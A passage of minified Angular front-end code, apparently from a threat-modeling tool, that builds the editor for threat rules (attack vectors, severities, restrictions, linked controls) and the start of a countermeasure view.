"),u(),s(94,"\n    "),it(95,"br"),s(96,"\n    "),ne(97,P8e,29,14,"div",16),s(98,"\n    "),ne(99,DIe,46,21,"div",16),s(100,"\n    "),ne(101,WIe,29,14,"div",16),s(102,"\n    "),ne(103,XIe,29,14,"div",16),s(104,"\n    "),m(105,"div",17),s(106,"\n      "),m(107,"div",18),s(108,"\n        "),m(109,"mat-list",19),he("cdkDropListDropped",function(n){be(e);const r=B();return Me(r.dropControl(n,r.GetControls()))}),s(110,"\n          "),m(111,"div",20),s(112),oe(113,"translate"),m(114,"button",21),oe(115,"translate"),m(116,"mat-icon"),s(117,"add"),u()(),s(118,"\n            "),m(119,"mat-menu",null,22),s(121,"\n              "),m(122,"button",23),he("click",function(){return be(e),Me(B().AddControl())}),s(123),oe(124,"translate"),u(),s(125,"\n              "),m(126,"button",24),s(127),oe(128,"translate"),u(),s(129,"\n            "),u(),s(130,"\n            "),m(131,"mat-menu",null,25),s(133,"\n              "),ne(134,YIe,2,1,"button",26),s(135,"\n            "),u(),s(136,"\n          "),u(),s(137,"\n          "),ne(138,JIe,19,14,"mat-list-item",27),s(139,"\n          "),ne(140,e5e,10,5,"ng-container",16),s(141,"\n        "),u(),s(142,"\n      "),u(),s(143,"\n      "),m(144,"div",28),s(145,"\n        "),ne(146,t5e,4,4,"div",29),s(147,"\n      "),u(),s(148,"\n    "),u(),s(149,"\n  "),u(),s(150,"\n"),u()}if(2&t){const e=Ti(120),i=Ti(132),n=B();let r;Ct("disable",!n.canEdit),C(2),V("ngModel",n.threatRule.IsActive),C(1),ke(re(4,48,"properties.IsActive")),C(5),V("ngIf",n.canEditName),C(2),Ct("disable",!n.threatRule.IsActive),C(5),ke(re(16,50,"general.AttackVector")),C(3),at("matTooltip",null==n.threatRule.AttackVector?null:n.threatRule.AttackVector.Name),V("value",n.threatRule.AttackVector),C(3),ke(re(22,52,"properties.selectNone")),C(3),V("ngForOf",n.GetAttackVectorGroups()),C(3),at("matTooltip",re(28,54,"general.Edit")),V("disabled",!n.threatRule.AttackVector),C(7),at("matTooltip",re(35,56,"general.Add")),C(11),ke(re(46,58,"properties.Severity")),C(3),V("value",n.threatRule.Severity),C(3),ke(re(52,60,"properties.selectNone")),C(3),V("ngForOf",n.GetSeverityTypes()),C(4),V("ngIf",n.showAttackVector&&n.threatRule.AttackVector),C(5),ke(re(64,62,"general.ThreatCategories")),C(3),V("value",n.threatRule.ThreatCategories),C(2),V("ngForOf",n.GetThreatCategoryGroups()),C(7),ke(re(76,64,"properties.Description")),C(3),V("spellcheck",n.dataService.HasSpellCheck)("ngModel",n.threatRule.Description),C(3),V("ngIf",kr(76,i5e).includes(n.threatRule.RuleType)),C(5),ke(re(87,66,"properties.OverridenRules")),C(3),V("value",n.threatRule.OverridenRules),C(2),V("ngForOf",n.GetAvailableThreatRuleGroups()),C(6),V("ngIf",1==n.threatRule.RuleType),C(2),V("ngIf",2==n.threatRule.RuleType),C(2),V("ngIf",3==n.threatRule.RuleType),C(2),V("ngIf",4==n.threatRule.RuleType),C(6),Ct("prop-list-light",!n.theme.IsDarkMode)("prop-list-dark",n.theme.IsDarkMode),C(3),ct("",re(113,68,"general.Controls")," \n            "),C(2),at("matTooltip",re(115,70,"general.Add")),V("matMenuTriggerFor",e),C(9),ke(re(124,72,"general.New")),C(3),V("matMenuTriggerFor",i),C(1),ke(re(128,74,"general.Existing")),C(7),V("ngForOf",n.GetPossibleControls()),C(4),V("ngForOf",n.GetControls()),C(2),V("ngIf",(null==(r=n.GetVectorControls())?null:r.length)>0),C(6),V("ngIf",n.selectedControl)}}let qp=(()=>{class t{constructor(e,i,n,r,c){this.theme=i,this.dataService=n,this.dialog=r,this.translate=c,this.canEdit=!0,this.canEditName=!1,this.showAttackVector=!0,this.threatRuleGroups={},this.propertyGroups={},this.phyPropertyGroups={},this.interfacePropertyGroups=null,e&&(this.threatRule=e,this.canEdit=!1)}get threatRule(){return this._threatRule}set threatRule(e){this._threatRule=e,this.selectedRestriction=null,this.propertyGroups={},this.phyPropertyGroups={},this.interfacePropertyGroups=null,this.threatRuleGroups={},this.selectedControl=null}get selectedStencilType(){var e,i;if(null!==(i=null===(e=this.threatRule)||void 0===e?void 0:e.StencilRestriction)&&void 0!==i&&i.stencilTypeID)return this.dataService.Config.GetStencilType(this.threatRule.StencilRestriction.stencilTypeID)}get selectedStencilElementType(){var e;return null!==(e=this.selectedStencilType)&&void 0!==e&&e.ElementTypeID?this.dataService.Config.GetStencilElementType(this.selectedStencilType):null}get selectedComponentType(){var e,i;if(null!==(i=null===(e=this.threatRule)||void 0===e?void 0:e.ComponentRestriction)&&void 0!==i&&i.componentTypeID)return this.dataService.Config.GetMyComponentType(this.threatRule.ComponentRestriction.componentTypeID)}get selectedProtocol(){var e,i;if(null!==(i=null===(e=this.threatRule)||void 0===e?void 0:e.ProtocolRestriction)&&void 0!==i&&i.protocolID)return this.dataService.Config.GetProtocol(this.threatRule.ProtocolRestriction.protocolID)}ngOnInit(){}OnAttackVectorChanged(e){this.threatRule.ThreatCategories=null==e?void 0:e.ThreatCategories}GetAttackVectorGroups(){return this.dataService.Config.GetAttackVectorGroups().filter(e=>e.AttackVectors.length>0)}GetThreatCategoryGroups(){return this.dataService.Config.GetThreatCategoryGroups().filter(e=>e.ThreatCategories.length>0)}GetAvailableThreatRuleGroups(){if(!this.threatRuleGroups[this.threatRule.RuleType]){let e=[];if(this.threatRule.RuleType==on.Stencil){let i={Name:this.translate.instant("properties.StencilRules"),ThreatRules:this.dataService.Config.GetThreatRules().filter(n=>n.RuleType==on.Stencil&&n.ID!=this.threatRule.ID)};e.push(i)}else if(this.threatRule.RuleType==on.Component){let i={Name:this.translate.instant("properties.ComponentRules"),ThreatRules:this.dataService.Config.GetThreatRules().filter(n=>n.RuleType==on.Component&&n.ID!=this.threatRule.ID)};e.push(i)}else{let i=n=>{var r,c;(null===(r=n.ThreatRules)||void 0===r?void 0:r.length)>0&&e.push({Name:n.Name,ThreatRules:n.ThreatRules.filter(d=>d.RuleType==on.DFD&&d.ID!=this.threatRule.ID)}),(null===(c=n.SubGroups)||void 0===c?void 0:c.length)>0&&n.SubGroups.forEach(d=>i(d))};i(this.dataService.Config.DFDThreatRuleGroups)}this.threatRuleGroups[this.threatRule.RuleType]=e}return this.threatRuleGroups[this.threatRule.RuleType]}AddStencilRestriction(){this.threatRule.StencilRestriction.DetailRestrictions.push({IsOR:!0,Layer:0,RestType:ya.Property,PropertyRest:{ID:"",ComparisonType:cc.Equals,Value:null}})}RemoveStencilRestriction(e){this.threatRule.StencilRestriction.DetailRestrictions.splice(e,1)}AddComponentRestriction(){this.threatRule.ComponentRestriction.DetailRestrictions.push({IsOR:!0,Layer:0,RestType:ya.Property,PropertyRest:{ID:"",ComparisonType:cc.Equals,Value:!1}})}RemoveComponentRestriction(e){this.threatRule.ComponentRestriction.DetailRestrictions.splice(e,1)}AddProtocolRestriction(){this.threatRule.ProtocolRestriction.DetailRestrictions.push({IsOR:!0,Layer:0,RestType:ya.Property,PropertyRest:{ID:"",ComparisonType:cc.Equals,Value:!1}})}RemoveProtocolRestriction(e){this.threatRule.ProtocolRestriction.DetailRestrictions.splice(e,1)}HasPhysicalElement(){return this.selectedStencilType?!Sc.IsPhysical(this.selectedStencilType.ElementTypeID):null}EditAttackVector(){this.dialog.OpenViewAttackVectorDialog(this.threatRule.AttackVector,!0)}AddAttackVector(){let e=this.dataService.Config.CreateAttackVector(null);this.dialog.OpenAddAttackVectorDialog(e).subscribe(i=>{i?(this.threatRule.AttackVector=e,this.threatRule.ThreatCategories=e.ThreatCategories):this.dataService.Config.DeleteAttackVector(e)})}AddDFDNode(e){this.threatRule.DFDRestriction.NodeTypes.splice(e,0,{TypeIDs:[]}),this.propertyGroups={}}RemoveDFDNode(e,i){setTimeout(()=>{i.close()},10),this.threatRule.DFDRestriction.NodeTypes.splice(e,1),this.propertyGroups={}}AddDFDNodeRestriction(){this.threatRule.DFDRestriction.NodeRestrictions.push({Layer:0,NodeNumber:-1,IsOR:!1,RestType:ya.Property,PropertyRest:{ID:"",ComparisonType:cc.Equals,Value:null}})}RemoveDFDNodeRestriction(e){this.threatRule.DFDRestriction.NodeRestrictions.splice(e,1)}GetLayerPadding(e){return(20*e.Layer).toString()+"px"}GetRuleElements(){let e=["Data Flow","Sender"];for(let i=0;i<this.threatRule.DFDRestriction.NodeTypes.length-2;i++)e.push("Node"+(i+1).toString());return e.push("Receiver"),e}OnNextComparisonType(e,i){let n=Object.values(cc),r=n.length;this.GetPropertyEditType(e)==Ii.CheckBox&&(r=2),i.ComparisonType=n[(n.indexOf(i.ComparisonType)+1)%r]}GetPropertyEditType(e){var i,n,r,c,d;let k,T=(q,Y)=>{for(let te=0;te<q.length;te++){let pe=q[te].Properties.find(Re=>Re.ID==Y);if(pe)return pe}};return this.threatRule.RuleType==on.Stencil?e.RestType==ya.Property?k=T(this.propertyGroups[-2],null===(i=e.PropertyRest)||void 0===i?void 0:i.ID):e.RestType==ya.PhysicalElement&&(k=T(this.phyPropertyGroups[Sc.GetPhyiscalID(this.selectedStencilType.ElementTypeID)],null===(r=null===(n=e.PhyElementRest)||void 0===n?void 0:n.Property)||void 0===r?void 0:r.ID)):this.threatRule.RuleType==on.Component?e.RestType==ya.Property&&(k=T(this.propertyGroups[-2],null===(c=e.PropertyRest)||void 0===c?void 0:c.ID)):e.RestType==ya.Property?k=T(this.propertyGroups[e.NodeNumber],null===(d=e.PropertyRest)||void 0===d?void 0:d.ID):e.RestType==ya.PhysicalElement?k=T(this.phyPropertyGroups[e.NodeNumber],e.PhyElementRest.Property.ID):e.RestType==ya.SenderInterface?k=T(this.interfacePropertyGroups,e.SenderInterfaceRestriction.Property.ID):e.RestType==ya.ReceiverInterface&&(k=T(this.interfacePropertyGroups,e.ReceiverInterfaceRestriction.Property.ID)),null==k?void 0:k.Type}GetAvailablePropertyGroups(e){let i=this.threatRule.RuleType==on.DFD?e.NodeNumber:-2;return null==this.propertyGroups[i]&&(this.propertyGroups[i]=this.GetPropertyGroups(e)),this.propertyGroups[i]}GetPropertyGroups(e){if(this.threatRule.RuleType==on.Stencil){let i=this.selectedStencilType;if(i)return[{GroupName:i.Name+"'s "+this.translate.instant("general.Properties"),Properties:this.dataService.Config.GetAllStencilProperties(i)}]}else if(this.threatRule.RuleType==on.Component){let i=this.selectedComponentType;if(i)return[{GroupName:i.Name+"'s "+this.translate.instant("general.Properties"),Properties:i.Properties}]}if(-1==e.NodeNumber)return[{GroupName:"Data Flow's "+this.translate.instant("general.Properties"),Properties:this.dataService.Config.GetAllStencilProperties(this.dataService.Config.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Et.DataFlow))}];if(0==this.threatRule.DFDRestriction.NodeTypes[e.NodeNumber].TypeIDs.length)return[];if(this.threatRule.DFDRestriction.NodeTypes[e.NodeNumber].TypeIDs.length>1){let i=[],n={GroupName:this.translate.instant("pages.config.commonProperties"),Properties:[]};i.push(n);let r=[],c=[];this.threatRule.DFDRestriction.NodeTypes[e.NodeNumber].TypeIDs.forEach(T=>r.push(this.dataService.Config.GetStencilType(T))),r.forEach(T=>c.push(this.dataService.Config.GetAllStencilProperties(T)));let d={GroupName:r[0].Name+"'s "+this.translate.instant("general.Properties"),Properties:[]};c[0].forEach(T=>{c.every(k=>k.some(q=>q.ID==T.ID))?n.Properties.push(T):d.Properties.push(T)}),i.push(d);for(let T=1;T<r.length;T++){let k={GroupName:r[T].Name+"'s "+this.translate.instant("general.Properties"),Properties:[]};c[T].forEach(q=>{n.Properties.some(Y=>Y.ID==q.ID)||k.Properties.push(q)}),i.push(k)}return i=i.filter(T=>T.Properties.length>0),i}{let i=this.dataService.Config.GetStencilType(this.threatRule.DFDRestriction.NodeTypes[e.NodeNumber].TypeIDs[0]);if(i)return[{GroupName:i.Name+"'s "+this.translate.instant("general.Properties"),Properties:this.dataService.Config.GetAllStencilProperties(i)}]}return[]}GetDataFlowEntityTypes(){let e=[],i=[Et.LogProcessing,Et.LogDataStore,Et.LogExternalEntity,Et.PhyExternalEntity,Et.PhysicalLink];return i.forEach(n=>{e.push(...this.dataService.Config.GetStencilTypes().filter(r=>r.IsDefault&&r.ElementTypeID==n))}),i.forEach(n=>{e.push(...this.dataService.Config.GetStencilTypes().filter(r=>!r.IsDefault&&r.ElementTypeID==n))}),e}SetPropertyDefaultValue(e,i){e.ID=i.ID,null!=i.DefaultValue&&(e.Value=i.DefaultValue)}CreatePropertyRestrictionType(e,i){let n={ID:"",ComparisonType:cc.Equals,Value:null};i==ya.DataFlowCrosses?e.DataflowRest||(e.DataflowRest={TrustAreaIDs:[]}):i==ya.PhysicalElement?e.PhyElementRest||(e.PhyElementRest={Property:n}):i==ya.Property?e.PropertyRest||(e.PropertyRest=n):i==ya.SenderInterface?e.SenderInterfaceRestriction||(e.SenderInterfaceRestriction={Property:n}):i==ya.ReceiverInterface&&(e.ReceiverInterfaceRestriction||(e.ReceiverInterfaceRestriction={Property:n}))}GetAvailableTrustAreas(){return this.dataService.Config.GetStencilTypes().filter(e=>e.ElementTypeID==Et.LogTrustArea||e.ElementTypeID==Et.PhyTrustArea)}GetAvailablePhyElementPropertyGroups(e){let i=null;if(this.threatRule.RuleType==on.Stencil?i=Sc.GetPhyiscalID(this.selectedStencilType.ElementTypeID):1==this.threatRule.DFDRestriction.NodeTypes[e.NodeNumber].TypeIDs.length&&(i=Sc.GetPhyiscalID(this.dataService.Config.GetStencilType(this.threatRule.DFDRestriction.NodeTypes[e.NodeNumber].TypeIDs[0]).ElementTypeID)),i){if(null==this.phyPropertyGroups[i]){let n=this.dataService.Config.GetStencilTypes().find(r=>r.IsDefault&&r.ElementTypeID==i);if(n){let r={GroupName:n.Name+"'s "+this.translate.instant("general.Properties"),Properties:n.Properties};this.phyPropertyGroups[i]=[r]}}return this.phyPropertyGroups[i]}return[]}GetAvailableInterfacePropertyGroups(e){return this.interfacePropertyGroups||(this.interfacePropertyGroups=[{GroupName:"Interface's "+this.translate.instant("general.Properties"),Properties:this.dataService.Config.GetAllStencilProperties(this.dataService.Config.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Et.Interface))}]),this.interfacePropertyGroups}GetRuleGenerationTypes(){return vG.GetTypes()}GetRuleGenerationTypeName(e){return vG.ToString(e)}GetRestrictionString(){return Fg.ToString(this.threatRule,this.dataService,this.translate)}GetAvailableRestrictionsTypes(e){return this.threatRule.RuleType==on.Stencil?this.HasPhysicalElement()?[ya.Property,ya.PhysicalElement]:[ya.Property]:this.threatRule.RuleType==on.Component?[ya.Property]:-1==e.NodeNumber?[ya.Property,ya.DataFlowCrosses,ya.SenderInterface,ya.ReceiverInterface]:1!=this.threatRule.DFDRestriction.NodeTypes[e.NodeNumber].TypeIDs.length||Sc.IsPhysical(this.dataService.Config.GetStencilType(this.threatRule.DFDRestriction.NodeTypes[e.NodeNumber].TypeIDs[0]).ElementTypeID)?[ya.Property]:[ya.Property,ya.PhysicalElement]}GetRestrictionTypeName(e){return class pwe{static GetTypes(){return[ya.Property,ya.DataFlowCrosses,ya.PhysicalElement,ya.SenderInterface,ya.ReceiverInterface]}static GetTypeNames(){let a=[];return Pl.GetTypes().forEach(e=>a.push(Pl.ToString(e))),a}static ToString(a){switch(a){case ya.Property:return"general.Property";case ya.DataFlowCrosses:return"pages.config.threatrule.trustLevelChange";case ya.PhysicalElement:return"properties.PhysicalElement";case ya.SenderInterface:return"properties.SenderInterface";case ya.ReceiverInterface:return"properties.ReceiverInterface";default:return console.error("Missing Restriction Type in RestrictionTypes.ToString()"),"Undefined"}}}.ToString(e)}GetControls(){return this.dataService.Config.GetControls().filter(e=>e.MitigatedThreatRules.includes(this.threatRule))}GetVectorControls(){return this.threatRule.AttackVector?this.dataService.Config.GetControls().filter(e=>e.MitigatedAttackVectors.includes(this.threatRule.AttackVector)):null}GetPossibleControls(){let e=this.dataService.Config.GetControls().filter(i=>!i.MitigatedThreatRules.includes(this.threatRule));return this.threatRule.AttackVector&&(e=e.filter(i=>!i.MitigatedAttackVectors.includes(this.threatRule.AttackVector))),e}AddExistingControl(e){e.AddMitigatedThreatRule(this.threatRule)}AddControl(){let e=this.dataService.Config.CreateControl(this.dataService.Config.ControlLibrary);e.AddMitigatedThreatRule(this.threatRule),this.selectedControl=e}RemoveControl(e){e.RemoveMitigatedThreatRule(this.threatRule),e==this.selectedControl&&(this.selectedControl=null)}DeleteControl(e){this.dataService.Config.DeleteControl(e),e==this.selectedControl&&(this.selectedControl=null)}dropControl(e,i){const n=this.dataService.Config.GetControls().indexOf(i[e.previousIndex]),r=this.dataService.Config.GetControls().indexOf(i[e.currentIndex]);Qs(this.dataService.Config.GetControls(),n,r)}GetSeverityTypes(){return vn.GetTypes()}GetSeverityTypeName(e){return vn.ToString(e)}SetLWH(e,i){e.Value=Number(i)}GetLMHValues(){return An.GetKeys()}GetLMHName(e){return An.ToString(e)}GetIcon(e){return Sc.Icon(e.ElementTypeID)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Fp,8),Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-rule"]],inputs:{node:"node",threatRule:"threatRule",canEdit:"canEdit",canEditName:"canEditName",showAttackVector:"showAttackVector"},decls:1,vars:1,consts:[["style","margin-left: 10px; margin-top: 10px;",3,"disable",4,"ngIf"],[2,"margin-left","10px","margin-top","10px"],["color","primary",2,"margin-bottom","10px",3,"ngModel","ngModelChange"],["appearance","fill","class","property-form-field",4,"ngIf"],["appearance","fill",1,"property-form-field"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange","selectionChange"],[3,"label",4,"ngFor","ngForOf"],["mat-icon-button","","matSuffix","","matTooltipShowDelay","1000",2,"width","25px",3,"disabled","matTooltip","click"],["mat-icon-button","","matSuffix","","matTooltipShowDelay","1000",2,"width","25px",3,"matTooltip","click"],["appearance","fill",2,"width","150px","margin-left","10px"],[3,"value","valueChange"],[3,"value",4,"ngFor","ngForOf"],["class","expansion-panel-headers-align","style","pointer-events: initial;",4,"ngIf"],["appearance","fill",2,"width","100%"],["multiple","",3,"value","valueChange"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[4,"ngIf"],[1,"row",2,"margin-top","10px"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matMenuTriggerFor","matTooltip"],["addMenu","matMenu"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"matMenuTriggerFor"],["existing","matMenu"],["mat-menu-item","",3,"click",4,"ngFor","ngForOf"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["style","margin: 10px 0 10px 10px;",4,"ngIf"],["matInput","",3,"spellcheck","ngModel","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[3,"label"],[3,"value"],[1,"expansion-panel-headers-align",2,"pointer-events","initial"],[2,"margin-bottom","20px"],["matExpansionPanelContent",""],[3,"canEdit","attackVector"],["matTooltipShowDelay","1000",3,"value","matTooltip",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",3,"value","matTooltip"],["appearance","fill",1,"property-form-field","disable"],["matInput","","matTooltipShowDelay","1000",3,"spellcheck","value","matTooltip"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[2,"margin-left","10px"],[4,"ngFor","ngForOf"],["matPrefix","","matInput","","min","0","type","number",2,"width","30px",3,"ngModel","ngModelChange"],[3,"value","click",4,"ngFor","ngForOf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",2,"width","25px",3,"matTooltip","click"],["mat-raised-button","","style","margin-left: 10px; vertical-align: super;",3,"click",4,"ngIf"],[3,"value","click"],["appearance","fill",1,"property-form-field",2,"margin-left","10px"],["mat-raised-button","",2,"margin-left","10px","vertical-align","super",3,"click"],["color","primary",2,"margin-left","10px","vertical-align","super",3,"ngModel","ngModelChange"],[2,"width","75px","margin-left","10px","vertical-align","super",3,"ngModel","change"],["mat-icon-button","","matTooltipShowDelay","1000",2,"vertical-align","super",3,"matTooltip","click"],[1,"btn-icon"],["typeSelect",""],["matSuffix","","mat-icon-button","","style","width: 25px;","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["mat-icon-button","","style","vertical-align: super;","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["appearance","fill","class","property-form-field","style","margin-left: 10px;",4,"ngIf"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line","",2,"pointer-events","initial"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto","margin-right","0px",3,"matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],["matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",3,"matTooltip","click"],[2,"margin","10px 0 10px 10px"],[3,"control","canEdit","canEditName","canEditGroup"]],template:function(e,i){1&e&&ne(0,a5e,151,77,"div",0),2&e&&V("ngIf",i.threatRule)},styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.disable[_ngcontent-%COMP%]{pointer-events:none}.property-form-field[_ngcontent-%COMP%]{width:300px}.restrictions-column1[_ngcontent-%COMP%]{float:left;width:300px}.restrictions-column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 310px)}.btn-icon[_ngcontent-%COMP%]{opacity:.5}.btn-icon[_ngcontent-%COMP%]:hover{opacity:1}.btn-selected-light[_ngcontent-%COMP%]{opacity:1;background-color:#00000026;border-radius:5px}.btn-selected-dark[_ngcontent-%COMP%]{opacity:1;background-color:#ffffff26;border-radius:5px}']}),t})();const n5e=["nameBox"],o5e=["searchTCBox"];function r5e(t,a){if(1&t){const e=Ye();m(0,"button",30),he("click",function(){return be(e),Me(B(2).countermeasure.Name="")}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n    "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function s5e(t,a){1&t&&(m(0,"mat-hint",31),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct("\n      ",re(2,1,"messages.error.numberAlreadyExists"),"\n    "))}function c5e(t,a){if(1&t&&(m(0,"mat-option",32),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetMitigationStateName(e)))}}function l5e(t,a){1&t&&(m(0,"mat-icon",33),oe(1,"translate"),s(2,"sync_problem"),u()),2&t&&at("matTooltip",re(1,1,"pages.modeling.countermeasure.ruleNotApplyingAnymore"))}function d5e(t,a){if(1&t&&(m(0,"mat-option",32),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(e.Name)}}function m5e(t,a){if(1&t&&(m(0,"mat-form-field",34),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),it(6,"input",35),s(7,"\n  "),u()),2&t){const e=B(2);C(3),ct("",re(4,2,"general.Targets"),"*"),C(3),V("value",e.GetTargetsNames())}}function u5e(t,a){if(1&t&&(m(0,"mat-option",32),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ct("\n        ",e.GetProperty("Name"),"\n      ")}}function h5e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",36),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"mat-select",37),he("valueChange",function(n){return be(e),Me(B(2).countermeasure.Targets=n)}),s(7,"\n      "),m(8,"mat-option"),s(9),oe(10,"translate"),u(),s(11,"\n      "),ne(12,u5e,2,2,"mat-option",10),s(13,"\n    "),u(),s(14,"\n  "),u()}if(2&t){const e=B(2);C(3),ct("",re(4,5,"general.Targets"),"*"),C(3),at("matTooltip",e.GetTargetsNames()),V("value",e.countermeasure.Targets),C(3),ke(re(10,7,"properties.selectNone")),C(3),V("ngForOf",e.elements)}}function f5e(t,a){if(1&t&&(m(0,"mat-option",32),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ct("\n          ",e.Name,"\n        ")}}function p5e(t,a){if(1&t&&(m(0,"mat-optgroup",38),s(1,"\n        "),ne(2,f5e,2,2,"mat-option",10),s(3,"\n      "),u()),2&t){const e=a.$implicit;V("label",e.name),C(2),V("ngForOf",e.Controls)}}function _5e(t,a){if(1&t&&(s(0,"\n        "),it(1,"app-control",40),s(2,"\n      ")),2&t){const e=B(3);C(1),V("canEdit",!1)("control",e.countermeasure.Control)}}function g5e(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n      "),m(2,"mat-expansion-panel-header"),s(3,"\n        "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n        "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n        "),u(),s(13,"\n      "),u(),s(14,"\n      "),ne(15,_5e,3,2,"ng-template",39),s(16,"\n    "),u()),2&t){const e=B(2);C(5),ct("\n          ",re(6,2,"general.ControlInfo"),"\n        "),C(4),ct("\n          ",e.countermeasure.Control.Name,"\n          ")}}function C5e(t,a){if(1&t&&(s(0,"\n        "),it(1,"app-mitigation-process",41),s(2,"\n      ")),2&t){const e=B(3);C(1),V("canEdit",!1)("mitigationProcess",e.countermeasure.MitigationProcess)}}function y5e(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n      "),m(2,"mat-expansion-panel-header"),s(3,"\n        "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n        "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n        "),u(),s(13,"\n      "),u(),s(14,"\n      "),ne(15,C5e,3,2,"ng-template",39),s(16,"\n    "),u()),2&t){const e=B(2);C(5),ct("\n          ",re(6,2,"general.MitigationProcessInfo"),"\n        "),C(4),ct("\n          ",e.countermeasure.MitigationProcess.Name,"\n          ")}}function b5e(t,a){if(1&t&&(s(0,"\n        "),it(1,"app-attack-scenario",42),s(2,"\n      ")),2&t){const e=B().$implicit;C(1),V("canEdit",!1)("attackScenario",e)}}function M5e(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n      "),m(2,"mat-expansion-panel-header"),s(3,"\n        "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n        "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n        "),u(),s(13,"\n      "),u(),s(14,"\n      "),ne(15,b5e,3,2,"ng-template",39),s(16,"\n    "),u()),2&t){const e=a.$implicit;C(5),ct("\n          ",re(6,2,"pages.modeling.countermeasure.mitigatedThreats"),"\n        "),C(4),ct("\n          ",null==e?null:e.GetProperty("Name"),"\n          ")}}function v5e(t,a){if(1&t){const e=Ye();m(0,"button",56),he("click",function(){const r=be(e).$implicit;return Me(B(3).OnLinkTestCase(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Name)}}function A5e(t,a){if(1&t){const e=Ye();m(0,"button",56),he("click",function(){const r=be(e).$implicit;return Me(B(3).OnLinkTestCase(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Name)}}function T5e(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",57),he("click",function(){const r=be(e).$implicit;return Me(B(3).selectedTestCase=r)}),s(1,"\n          "),m(2,"mat-icon",58),s(3,"arrow_right"),u(),s(4,"\n          "),m(5,"div",59),s(6),u(),s(7,"\n          "),m(8,"button",60),he("click",function(){const r=be(e).$implicit;return 